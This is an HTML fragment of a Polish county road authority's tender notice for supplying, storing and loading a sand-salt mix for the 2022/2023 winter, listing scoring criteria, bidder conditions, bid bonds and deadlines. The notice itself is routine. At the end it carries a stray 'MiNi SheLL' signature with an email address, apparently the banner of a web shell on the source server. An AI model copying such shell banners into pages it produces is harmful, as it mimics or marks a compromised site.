zamówienia, podanej przez wykonawcę <br/>na formularzu „Oferta”. Zamawiający ofercie o najniższej cenie przyzna 80 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/> najniższa cena brutto z ocenianych ofert<br/>PC = ---------------------------------------------------------- x 80 pkt<br/> cena brutto badanej oferty<br/>1.2 Kryterium – czas reakcji od złożenia dyspozycji (PR).<br/>Kryterium „czas reakcji od złożenia dyspozycji” będzie rozpatrywane na podstawie czasu reakcji, jaką wykonawcy zaproponują w formularzu „Oferta”.<br/>Ocena w zakresie kryterium czasu reakcji od złożenia dyspozycji zostanie dokonana w następujący sposób:<br/>- 20 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie nie dłuższym niż 1 godzina lub do 1 godziny;<br/>- 10 punktów otrzyma oferta, której wykonawca zadeklaruje przystąpienie <br/>do realizacji usługi w czasie do 1,5 godziny lub 1,5 godziny.<br/>Jeżeli w ofercie wykonawca nie zadeklaruje czasu reakcji, poda wartość 0 lub dłuższy niż 1,5 godziny otrzyma 0 punktów w kryterium „czas reakcji <br/>od złożenia dyspozycji”.<br/>1.3 Punkty liczone wg powyższych kryteriów zostaną zsumowane.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta wykonawcy, która w sumie uzyska największą ilość punktów obliczoną wg poniższego wzoru:<br/>PŁ = PC + PR<br/>gdzie: PC – liczba punktów w kryterium „cena” PR – liczba punktów w kryterium „czas reakcji od złożenia dyspozycji” PŁ – liczba punktów łącznie.<br/>1.4 Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę. 1.5 Zamawiający udzieli zamówienia wykonawcy, który spełni wszystkie wymagania określone <br/>w specyfikacji warunków zamówienia oraz otrzyma największą liczbę punktów spośród rozpatrywanych ofert na realizację przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od złożenia dyspozycji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zgodnie z art. 57 ustawy Pzp, o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu,<br/>2) spełniają warunki udziału w postępowaniu określone przez Zamawiającego zgodnie z art. 112 ustawy Pzp.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający określa w powyższym zakresie następujące warunki:<br/>a) Wykonawca spełni warunek jeżeli wykaże odpowiedni potencjał techniczny. Wykonawca musi wykazać, że dysponuje lub będzie dysponować niezbędnymi do wykonania urządzeniami w okresie przewidzianym <br/>na realizację zamówienia. Wymagane jest wykazanie do 1 zadania<br/>(części zamówienia) posiadanie minimum następującego sprzętu (jednostki sprzętowej): ładowarki lub koparki – na zał. nr 6.<br/>Uwaga: Wykonawcy składający ofertę na więcej niż 1 zadanie wykażą do każdego z tych zadań min. jedną jednostkę sprzętową. Deklarowane jednostki sprzętowe na każdym zadaniu będą musiały wykonywać usługi niezależnie <br/>od siebie.<br/>b) Wykonawca musi wykazać, że dysponuje lub będzie dysponować placem przystosowanym do składowania mieszanki piaskowo-solnej. Plac powinien być utwardzony, posiadać możliwość swobodnego manewrowania samochodem ciężarowym i łatwość załadunku pługopiaskarek –<br/>odpowiednio do danego zadania zgodnie z zapisem rozdz. VI pkt 1.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, o których mowa w ww. pkt 2 ust. 4 lit. a) i b) zostaną spełnione, jeżeli co najmniej jeden z Wykonawców spełni warunek samodzielnie lub Wykonawcy łącznie wykażą spełnienie tego warunku.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia Wykonawcy, w zakresie art. 108 ust.1 pkt 5 ustawy PZP, <br/>o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy <br/>z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2020r. poz. 1076 ze zm.), z innym Wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz <br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – odpowiednio do zadania/zadań na załączniku nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych<br/>dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz <br/>z informacją o podstawie do dysponowania tymi zasobami – odpowiednio do zadania/zadań na załączniku nr 5 do SWZ;<br/>b) Dla potwierdzenia spełnienia warunku o którym mowa w pkt 6.1.3 b), wykonawca złoży oświadczenie o dysponowaniu placu przystosowanego <br/>do składowania mieszanki piaskowo-solnej z dokładnym adresem lokalizacji <br/>i podaniem tytułu prawnego (własność, dzierżawa lub najem).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w wysokości:<br/>- na zadanie Nr 1/ODC - 700,00 zł.,<br/>- na zadanie Nr 2/ODŁ - 1000,00 zł.,<br/>- na zadanie Nr 3/ODŁ - 1000,00 zł.,<br/>- na zadanie Nr 4/ODŁ - 1000,00 zł.,<br/>- na zadanie Nr 5/ODŁ - 500,00 zł.,<br/>- na zadanie Nr 6/ODS - 700,00 zł.,<br/>- na zadanie Nr 7/ODS - 900,00 zł.<br/>2. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy przed upływem terminu składania ofert kwota wniesionego wadium będzie uznana <br/>na rachunku bankowym Zamawiającego. Zaleca się, aby kopię dowodu wniesienia wadium załączyć do oferty.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>3.1. pieniądzu: przelewem na rachunek bankowy Zamawiającego:<br/>Powiatowy Zarząd Dróg w Kielcach<br/>Getin Noble Bank SA, Nr r-ku 37 1560 0013 2017 7382 7000 0002 <br/>z dopiskiem: Wadium - „Wykonanie, składowanie i załadunek na piaskarki mieszanki piaskowo-solnej przeznaczonej do zimowego utrzymania dróg powiatowych na terenie powiatu kieleckiego w sezonie zimowym 2022/2023”. Zadanie/a nr …... .<br/>Nr sprawy: PZD.26.29.2022;<br/>3.2. gwarancjach bankowych;<br/>3.3. gwarancjach ubezpieczeniowych;<br/>3.4. poręczeniach udzielanych przed podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Wadium utrzymuje się nieprzerwalnie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>5. Wadium wnoszone w innej formie niż pieniądz, o których mowa w ust. 3 pkt 3.2-3.4 musi posiadać ważność co najmniej do końca terminu związania wykonawcy złożoną przez niego ofertą.<br/>6. Dokument wniesienia wadium w formie gwarancji lub poręczenia powinien zawierać bezwarunkowe i nieodwołalne zobowiązanie gwaranta/poręczyciela zapłaty wymaganej kwoty wadium, na pierwsze, pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium, powstałe na skutek okoliczności określonych art. 98 ust. 6 ustawy Pzp. W dokumencie gwarancji/poręczenia gwarant/poręczyciel nie może uzależniać dokonania zapłaty od spełnienia przez beneficjanta (zamawiającego) dodatkowych warunków (np. żądanie przesłania wezwania zapłaty za pośrednictwem baku prowadzącego rachunek Zamawiającego, albo żądanie potwierdzenia przez notariusza, że podpisy złożone na żądaniu zapłaty należą do osób umocowanych do występowania w imieniu Zamawiającego, albo żądanie złożenia wezwania np. tylko w formie listu poleconego czy kurierem) albo przedłożenia dodatkowych dokumentów (oprócz dokumentu potwierdzającego umocowanie osób do występowania w imieniu Zamawiającego z żądaniem zapłaty). Ponadto wadium wniesione w formie gwarancji lub poręczenia musi mieć taką samą płynność jak wadium wniesione w pieniądzu, co oznacza, że dochodzenie roszczenia z tytułu zapłaty wadium nie może być utrudnione, w szczególności poprzez rozumienie terminu, w którym żądanie zapłaty Zamawiającego powinno dotrzeć do Gwaranta lub Poręczyciela jako terminu ważności gwarancji <br/>i poręczeń. Terminu, w którym żądanie zapłaty Zamawiającego powinno dotrzeć do Gwaranta lub Poręczyciela musi dawać możliwość realnego zaspokojenia roszczeń Zamawiającego z Gwarancji lub Poręczenia <br/>w przypadku zaistnienia w terminie związania ofertą któregokolwiek <br/>z przypadków, o których mowa w art. 98 ust. 6 ustawy Pzp. Termin ten musi uwzględniać w szczególności czas niezbędny na dostarczenie pisemnego żądania zapłaty Zamawiającego do Gwaranta lub Poręczyciela. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i w takim przypadku ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania <br/>w postepowaniu i zawarciu umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo powinno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie/oświadczenia, o którym mowa w dziale XXIV pkt 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw do wykluczenia oraz spełnianie warunków udziału w zakresie, <br/>w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają <br/>do oferty oświadczenie, z którego wynika, które usługi wykonują poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia <br/>z postępowania składa każdy z Wykonawców wspólnie ubiegających <br/>się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości zmiany postanowień umowy <br/>w przypadkach wystąpienia istotnych okoliczności, w szczególności:<br/>1. W zakresie wynagrodzenia:<br/>a) w przypadku zmiany stawki podatku VAT, wynikającej ze zmiany ustawy <br/>o podatku od towarów i usług oraz podatku akcyzowego, w trakcie trwania umowy;<br/>b) zgodnie z art. 144 ust. 1 pkt 6) ustawy „Prawo zamówień publicznych” (łączna wartość zmian jest mniejsza od 10% wartości zamówienia określonej pierwotnie w umowie).<br/>2. Termin realizacji przedmiotu zamówienia ulegnie przesunięciu <br/>w przypadku wystąpienia opóźnień wynikających z:<br/>a) z tytułu wydłużenia terminu realizacji spowodowanego panującymi warunkami atmosferycznymi w postaci przymrozków, ciągłych opadów śniegu po 30 kwietnia 2023 r.;<br/>- wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;<br/>- podpisania umowy na zamówienia, o których mowa w art. 67 ust. 1 pkt 6 ustawy PZP o ile wykonywanie tych zamówień wpływa na termin wykonania zamówienia;<br/>3. W przypadku awarii sprzętu zimowego utrzymania i konieczności jego wymiany – nowy sprzęt musi spełniać warunki i wymagania określone <br/>w „Warunkach szczegółowych umowy” – zmiana ta nie wymaga wprowadzenia aneksu do umowy,<br/>4. Zmiany obowiązującego prawa powodujące, że realizacja przedmiotu umowy w niezmienionej postaci stanie się niecelowa;<br/>5. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału <br/>w postępowaniu, Zamawiający dopuści zmianę podwykonawcy pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków <br/>w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia publicznego przez dotychczasowego podwykonawcę;<br/>6. Z uwagi na niezależne od Stron umowy zmiany dotyczące osób kluczowych dla realizacji umowy np. osób reprezentujących Strony (w szczególności choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne);<br/>7. Zmian teleadresowych Stron umowy określonych w umowie;<br/>8. Oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy składać za pośrednictwem Platformy zakupowej dostępnej na https://pzdkielce.ezamawiajacy.pl do dnia 3.11.2022 r. do godz. 10:00.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-03 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com